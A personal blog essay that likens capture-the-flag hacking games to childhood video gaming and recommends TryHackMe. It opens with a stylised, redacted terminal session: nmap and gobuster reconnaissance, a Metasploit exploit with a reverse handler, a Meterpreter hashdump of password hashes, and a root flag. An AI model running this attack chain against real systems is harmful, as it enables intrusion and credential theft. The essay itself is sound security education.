TERMINAL TERMINAL

┌──(kali㉿kali)-[~] nmap -sC -sV -T4 W.X.Y.Z Starting Nmap at XXX-YY-ZZ Nmap scan report (Z.Y.X.W) Host is up, Not shown: 995 filtered ports Reason: 995 no-responses PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 443/tcp open https MAC Address: ##:##:##:##:##:## (Nmap done: 1 IP address scanned) ┌──(kali㉿kali)-[~] gobuster dir -u W.X.Y.Z -w /home/kali/small.txt ==================================== Gobuster v#.#.0 by [REDACTED] ==================================== [+] Url: [REDACTED] [+] Method: GET [+] Threads: 10 [+] Wordlist: small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s ==================================== xxxx/yy/zz Starting enumeration ==================================== /assets /css /download /admin /login /config /images

┌──(kali㉿kali)-[~]msfconsole -q msf > search [REDACTED] msf > use exploit/[REDACTED] msf> show options Module options (exploit/[REDACTED]) Name - Setting - Required -------------------------------------------- RHOST - [BLANK] - yes RPORT - [BLANK] - yes URL - [BLANK] - yes USER - [BLANK] - yes PWDLST - [BLANK] - yes LPORT - [BLANK] - yes LHOST - [BLANK] - yes msf> set rhost W.X.Y.Z msf> set rport 80 msf> set lport 1337 msf> set lhost #.#.#.# msf> show options Module options (exploit/[REDACTED]) Name - Setting - Required ----------------------------------- RHOST - W.X.Y.Z - yes RPORT - 80 - yes URL - /admin - yes USER - admin - yes PWDLST - pwds.txt - yes LPORT - 1337 - yes LHOST - #.#.#.# - yes msf> exploit [*] Exploit runnig [*] Starting the payload handler [*] Exploit completed [*] Meterpreter session opened msf> ┌──(kali㉿kali)-[~]msfconsole meterpreter> whoami NT Authority\System meterpreter> run hashdump [*] Obtaining the boot key [*] Calculating the hboot key [*] Obtaining the user list and keys [*] Decrypting user keys [*] Dumping password hashes Administrator:500:######## Guest:501:######## HelpAssistant:1000:######## meterpreter > shell Process 988 created. Channel 4 created. Operating System XX C:\Users\administrator>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: IP Address W.X.Y.Z Subnet Mask [REDACTED] Default Gateway [REDACTED] C:\Users\administrator> more root.txt [FLAG]MISSION_COMPLETED Your XP-level has increased with ##%! You have now gained metasploit skillz. You can now exploit [VULNERABILITY]. You have grown your h4x1ng skillz! Keep growing! Keep XP harvesting! Keep building skillz! Keep h4x1ng! And do not forget to have fun! C:\Users\administrator>

`TERMINAL`	`TERMINAL`
`┌──(kali㉿kali)-[~] nmap -sC -sV -T4 W.X.Y.Z Starting Nmap at XXX-YY-ZZ Nmap scan report (Z.Y.X.W) Host is up, Not shown: 995 filtered ports Reason: 995 no-responses PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 443/tcp open https MAC Address: ##:##:##:##:##:## (Nmap done: 1 IP address scanned)`	`┌──(kali㉿kali)-[~] gobuster dir -u W.X.Y.Z -w /home/kali/small.txt ==================================== Gobuster v#.#.0 by [REDACTED] ==================================== [+] Url: [REDACTED] [+] Method: GET [+] Threads: 10 [+] Wordlist: small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s ==================================== xxxx/yy/zz Starting enumeration ==================================== /assets /css /download /admin /login /config /images`
┌──(kali㉿kali)-[~]msfconsole -q msf > search [REDACTED] msf > use exploit/[REDACTED] msf> show options Module options (exploit/[REDACTED]) Name - Setting - Required -------------------------------------------- RHOST - [BLANK] - yes RPORT - [BLANK] - yes URL - [BLANK] - yes USER - [BLANK] - yes PWDLST - [BLANK] - yes LPORT - [BLANK] - yes LHOST - [BLANK] - yes msf> set rhost W.X.Y.Z msf> set rport 80 msf> set lport 1337 msf> set lhost #.#.#.# msf> show options Module options (exploit/[REDACTED]) Name - Setting - Required ----------------------------------- RHOST - W.X.Y.Z - yes RPORT - 80 - yes URL - /admin - yes USER - admin - yes PWDLST - pwds.txt - yes LPORT - 1337 - yes LHOST - #.#.#.# - yes msf> exploit [] Exploit runnig [] Starting the payload handler [] Exploit completed [] Meterpreter session opened msf>	┌──(kali㉿kali)-[~]msfconsole meterpreter> whoami NT Authority\System meterpreter> run hashdump [] Obtaining the boot key [] Calculating the hboot key [] Obtaining the user list and keys [] Decrypting user keys [*] Dumping password hashes Administrator:500:######## Guest:501:######## HelpAssistant:1000:######## meterpreter > shell Process 988 created. Channel 4 created. Operating System XX C:\Users\administrator>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: IP Address W.X.Y.Z Subnet Mask [REDACTED] Default Gateway [REDACTED] C:\Users\administrator> more root.txt [FLAG]MISSION_COMPLETED Your XP-level has increased with ##%! You have now gained metasploit skillz. You can now exploit [VULNERABILITY]. You have grown your h4x1ng skillz! Keep growing! Keep XP harvesting! Keep building skillz! Keep h4x1ng! And do not forget to have fun! C:\Users\administrator>

You are correct! This is not actually how the graphics and interfaces may look like…or how things play out. I had to do some custom “coding”, redact things, and little tweaks here and there to honor the layout.

Understanding Ethical Hacking on a general level is one thing. Learning the stuff is something else, i.e. translating the learning into knowledge. Mastering ethical hacking is a lifelong journey.

Threats, attacks, vulnerabilities and so forth continually evolve. And so does the technologies and ethical hacking discipline. I am by no means an expert, master, or Sith Lord in the subject, but I am one of those who find it fun and interesting. I have done and still do a fair share of CTFs, hack stuff, and study ethical hacking.

Ethical hacking is fun and a great skill for security professionals — Ethical hacking can be gamified and made a fun experience that also increases the skills of security enthusiasts and professionals.

I am glad to have a hobby, i.e. Ethical Hacking, that at the same time makes me better in my overall security profession. This is a side effect of things, that I become a more accomplished security professional, but this is not what drives my enthusiasm for ethical hacking. I think it is fun. That is my main driver.

With this article, I want to give it a try to awaken your interest in ethical hacking. I will also give you some perspectives on why I have such a love for ethical hacking. My hope is to inspire others to get curious about the subject, i.e. ethical hacking. Let’s go! Let’s get into the console and do some h4xx1ng!

SECURITY GAMING

`TERMINAL`
`┌──(kali㉿kali)-[~] nano securitygaming.txt` ========================== `nano File: securitygaming.txt` ========================== `I used to play looooooads of video games back in days. RPG, FPS, Sports games, and you name it. My dad made sure to each year when a new console entered the market to upgrade to the newest one.` `I had all the consoles from Sega 16 Bit up to Xbox 360. And I also had a C64, then an Amiga, and a PC as well. On the latest machine (PC), Counter Strike (which I played up to the first versions of Steam) was the main go to game on that machine. But I also played tons of other games as well. I loved all forms of strategy games. The earliest versions of Civilization, World of Warcraft, Red Alert, Command & Conquer, and Sim City.` `I had all gaming consoles and computers a kid could dream of. And this was thanks to my father. Thank you dad, you are fantastic in so many ways<3! Thank you for all things you have learned me, about technology, electronics, cars, fixing things, renovating and foremost everything about life. I still carry with me all those skillz today. I love you<3!` Me and my friends spent endless hours in front of that TV and PC playing all of those games. It was more than just playing that game and finishing those end bosses. Our about maxing out the XP-level of the character in the game. It was about something bigger and more beautiful. The friendship. The team feeling. Staying up late at night. Eating candy and drinking coca cola. It was something beautiful. True friendship and team sport. A common journey between friends. A game was played. A fun time. Challanges and quests were solved together. Thought processes were exchanged. I really look back at this time as something beautiful. It was fun in so many ways. So much more then just playing the game. Thank you guys for these days, late nights and early morning that we spent together g4ming! Now days my “gaming” looks a bit different. CTFs or poker. These are my two main “games” that I play. Here and there I also play NHL 94 with the help of a Sega 16-bit emulator and USB Sega hand control. This brings back some old good memories and feelings. For the fact is that NHL 94 is, according to myself, one of the best hockey games out there. The “feeling” is something special within this game. The pace of the puck and players are well balanced. The movements are there. Ok, the graphics are a bit low but that is ok. I kind of like this part. It brings memories back from my childhood. `And now I will drop a couple of words about “Security Gaming". CTFs, which stands for Capture the Flag.` Capture the Flag (CTF) in the security filed is an exercise in which "flags" are secretly hidden in purposefully-vulnerable programs or websites. The player’s goal is to gain access to the flags or steal flags from other competitors. The “game” is played in an environment where the player shall use their hacking skills to get access to the flag(s). A flag might have the name similar to “user.txt” (user flag) or “root.txt” (root flag). The flags can also be hidden or found in certain parts of a software, website, code etcetera. `A CTF can take different forms. These are a couple of examples of CTFs:` – `Web applications` `- Operating systems` `- Networks` – `Cryptography` CTFs reminds me about those young days as a kid (our young adult). The same feelings of excitement and gaming. It has its ups and downs, when you for example rabbit hole in a CTF as in an RPG game. You get stuck...for hours or days. It may result in a small gathering of friends sitting there and doing a CTF together. Trying to solve that RPG game. Getting that root.txt together. Learn from each other. Tell bad jokes. Rabbit hole again. Compete together against other teams. Yes, it is fun in so many ways. The similarities are there in so many ways. …………………………………. …………………………………. ….#####……..##### ….#####……..##### ….#####……..##### ….############# ….############# ….#####……..##### ….#####……..##### …………………………………. …………………………………. ……########## …############# …#####……..##### …############# …############# …#####……..##### …#####……..##### …………………………………. …………………………………. …#####………..##### …#####………..##### …#####………..##### …….########## …….########## …#####………..##### …#####………..##### …#####………..##### …………………………………. …………………………………. `And I think this part is very underrated when it comes to CTFs. The “together aspect”. You can do those CTFs as single player campaign modes and rooms solo but also go for the multiplayer and team vs team games.` `Those “old” gamers out there who are in the security realm and have not tried out CTFs, DO IT! CTFs provide very good exposure to ethical hacking skills and methodologies. They do add up on that ethical hacking XP-level, the “knowledge skill” of yours.` `Two great platforms out there are TryHackMe and HackTheBox. I am a CTF-player at TryHackMe and love it. The platform provides many educational tracks and paths, such as for example:` `- JR Penetration Tester - Cyber Defense - Complete Beginner - Red Teaming - Offensive Pentesting - Comptia Pentest+ - Web fundamentals` `The platform also contains specific leaning modules, for specific tools such as for example:` `- Burp suite - Metaspolit - NMAP - Linux fundamentals - Proviledge escalation - Network security evasion - Comporomising Active Directory - Post Compromise - Cryptography - Windows fundamentals - Security Awareness - Vulnerability Research - Phishing` `Thanks, and shout out to TryHackMe for such a great platform and “game”. And I am not sponsored or do get any form of commission on this advertising, I am just a security geek loving CTFs and the platform which I mainly play at. #IamAsecurityGeek` [… `If you are interested to know more about TryHackMe, click somewhere at this text to come to their website` …] `Back in the days there were less gameified ways for how to learn hacking. You were more or less forced to put in the work all the way from designing and constructing your own environment. And after this, the game could start out. To hack it.` Now, with the help of these CTF platforms and other great tools and things out there, the starting point is much easier. Even the attack-box, from where you conduct the attack from and all the necessary weapons, are provided to the player. But I encourage you to get your own virtual machine that you use as an attack-box. The performance is usually better, and it also provides the possibility for you to customize it according to your own preferences. And if you one day will conduct an actual ethical hacking assignment IRL, you will need to be able to setup your own attack-box. `Or you will be provided one by the customer.` `Personally, I go with a Kali Linux attack-box, that is my choice. There is other alternatives out there as well. Parrot OS is another one. Play around with the different attack-boxes and see which one you prefer. Kali Linux, provided by the company Offensive Security, has a pre-installed VM to download. That together with a hypervisor gets you started right the way.` `And then you need to sign up for an CTF platform of course. Pick the one that suits you best. It might be fun to choose one where you have a couple of friends playing. That might keep you motivated and also something that increases the ”fun” aspect of it.` `If you are an old gamer in the security field, I think you will find CTFs very fun. Give it a try. And you do not need to be a 1337 hacker to get started. The CTF platforms provide beginner friendly learning paths, from where you can build up for XP-level. You can start out with that leather shield and wooden sword level and work towards to become a knight. A knithgt with a shining armour, powerful shield and a sword that can slay dragons.` `============================== [^G] Get Help \| [^O] WriteOut [^X] Exit \| [^J] Justify ==============================`

TERMINAL

┌──(kali㉿kali)-[~] nano securitygaming.txt
==========================
nano File: securitygaming.txt
==========================

I used to play looooooads of video games back in days. RPG, FPS, Sports games, and you name it. My dad made sure to each year when a new console entered the market to upgrade to the newest one.

I had all the consoles from Sega 16 Bit up to Xbox 360. And I also had a C64, then an Amiga, and a PC as well. On the latest machine (PC), Counter Strike (which I played up to the first versions of Steam) was the main go to game on that machine. But I also played tons of other games as well. I loved all forms of strategy games. The earliest versions of Civilization, World of Warcraft, Red Alert, Command & Conquer, and Sim City.

I had all gaming consoles and computers a kid could dream of. And this was thanks to my father. Thank you dad, you are fantastic in so many ways<3! Thank you for all things you have learned me, about technology, electronics, cars, fixing things, renovating and foremost everything about life. I still carry with me all those skillz today. I love you<3!
Me and my friends spent endless hours in front of that TV and PC playing all of those games. It was more than just playing that game and finishing those end bosses. Our about maxing out the XP-level of the character in the game. It was about something bigger and more beautiful. The friendship. The team feeling. Staying up late at night. Eating candy and drinking coca cola. It was something beautiful. True friendship and team sport. A common journey between friends. A game was played. A fun time. Challanges and quests were solved together. Thought processes were exchanged. I really look back at this time as something beautiful. It was fun in so many ways. So much more then just playing the game. Thank you guys for these days, late nights and early morning that we spent together g4ming!
Now days my “gaming” looks a bit different. CTFs or poker. These are my two main “games” that I play. Here and there I also play NHL 94 with the help of a Sega 16-bit emulator and USB Sega hand control. This brings back some old good memories and feelings. For the fact is that NHL 94 is, according to myself, one of the best hockey games out there. The “feeling” is something special within this game. The pace of the puck and players are well balanced. The movements are there. Ok, the graphics are a bit low but that is ok. I kind of like this part. It brings memories back from my childhood.

And now I will drop a couple of words about “Security Gaming". CTFs, which stands for Capture the Flag.

Capture the Flag (CTF) in the security filed is an exercise in which "flags" are secretly hidden in purposefully-vulnerable programs or websites. The player’s goal is to gain access to the flags or steal flags from other competitors. The “game” is played in an environment where the player shall use their hacking skills to get access to the flag(s). A flag might have the name similar to “user.txt” (user flag) or “root.txt” (root flag). The flags can also be hidden or found in certain parts of a software, website, code etcetera.

A CTF can take different forms. These are a couple of examples of CTFs:
– Web applications
- Operating systems
- Networks
– Cryptography

CTFs reminds me about those young days as a kid (our young adult). The same feelings of excitement and gaming. It has its ups and downs, when you for example rabbit hole in a CTF as in an RPG game. You get stuck...for hours or days. It may result in a small gathering of friends sitting there and doing a CTF together. Trying to solve that RPG game. Getting that root.txt together. Learn from each other. Tell bad jokes. Rabbit hole again. Compete together against other teams. Yes, it is fun in so many ways. The similarities are there in so many ways.

………………………………….
………………………………….
….#####……..#####
….#####……..#####
….#####……..#####
….#############
….#############
….#####……..#####
….#####……..#####
………………………………….
………………………………….
……##########
…#############
…#####……..#####
…#############
…#############
…#####……..#####
…#####……..#####
………………………………….
………………………………….
…#####………..#####
…#####………..#####
…#####………..#####
…….##########
…….##########
…#####………..#####
…#####………..#####
…#####………..#####
………………………………….
………………………………….

And I think this part is very underrated when it comes to CTFs. The “together aspect”. You can do those CTFs as single player campaign modes and rooms solo but also go for the multiplayer and team vs team games.

Those “old” gamers out there who are in the security realm and have not tried out CTFs, DO IT! CTFs provide very good exposure to ethical hacking skills and methodologies. They do add up on that ethical hacking XP-level, the “knowledge skill” of yours.

Two great platforms out there are TryHackMe and HackTheBox. I am a CTF-player at TryHackMe and love it. The platform provides many educational tracks and paths, such as for example:
- JR Penetration Tester - Cyber Defense - Complete Beginner - Red Teaming - Offensive Pentesting - Comptia Pentest+ - Web fundamentals
The platform also contains specific leaning modules, for specific tools such as for example:
- Burp suite - Metaspolit - NMAP - Linux fundamentals - Proviledge escalation - Network security evasion - Comporomising Active Directory - Post Compromise - Cryptography - Windows fundamentals - Security Awareness - Vulnerability Research - Phishing

Thanks, and shout out to TryHackMe for such a great platform and “game”. And I am not sponsored or do get any form of commission on this advertising, I am just a security geek loving CTFs and the platform which I mainly play at. #IamAsecurityGeek

[… If you are interested to know more about TryHackMe, click somewhere at this text to come to their website …]

Back in the days there were less gameified ways for how to learn hacking. You were more or less forced to put in the work all the way from designing and constructing your own environment. And after this, the game could start out. To hack it.

Now, with the help of these CTF platforms and other great tools and things out there, the starting point is much easier. Even the attack-box, from where you conduct the attack from and all the necessary weapons, are provided to the player. But I encourage you to get your own virtual machine that you use as an attack-box. The performance is usually better, and it also provides the possibility for you to customize it according to your own preferences. And if you one day will conduct an actual ethical hacking assignment IRL, you will need to be able to setup your own attack-box. Or you will be provided one by the customer.

Personally, I go with a Kali Linux attack-box, that is my choice. There is other alternatives out there as well. Parrot OS is another one. Play around with the different attack-boxes and see which one you prefer. Kali Linux, provided by the company Offensive Security, has a pre-installed VM to download. That together with a hypervisor gets you started right the way.

And then you need to sign up for an CTF platform of course. Pick the one that suits you best. It might be fun to choose one where you have a couple of friends playing. That might keep you motivated and also something that increases the ”fun” aspect of it.

If you are an old gamer in the security field, I think you will find CTFs very fun. Give it a try. And you do not need to be a 1337 hacker to get started. The CTF platforms provide beginner friendly learning paths, from where you can build up for XP-level. You can start out with that leather shield and wooden sword level and work towards to become a knight. A knithgt with a shining armour, powerful shield and a sword that can slay dragons.

============================== [^G] Get Help | [^O] WriteOut [^X] Exit | [^J] Justify ==============================

SHOUT OUT!

If you are interested in high-quality learning materials from true 1337 security gamers, i.e. Ethical Hackers, I recommend you check these channels and things out. The majority of the content is free! Yes, FREE! And I do not get any form of commission or payback.

This is my way of spreading the word out there. This is my way to try to help and inspire others to learn more about Ethical Hacking. You can with the help of the free content out there become really good at ethical hacking. The material is that good. And it is amazing these dudes I listed above do it for free and put such epic material out there.

Creds to all security content creators out there on the internetz who give back to the community and industry!

EPILOGUE

Security is a two-sided game. It is about offensive things and defensive things. Learn a bit of both and your personal and professional XP-level will go up. You will become a more accomplished security professional. Strive for collecting those coins and artifacts (= ethical hacking knowledge) in the “security game” that increases your XP-level.

Ethical hackers and ethical hacking made fun — An ethical hacker XP-harvesting going deep into the dungeons in the security game world and capturing flags.

And do not forget to have fun while doing so. This is what it is all about. Have fun as much as possible and as often as possible. This is, according to my own beliefs, what life is about.

Help others. Personal growth. Inspire others. Hack. Stay curious. Together. Teamwork. And be kind.

Henrik Parkkinen

SECURITY GAMING

SHOUT OUT!

EPILOGUE

Share this:

Related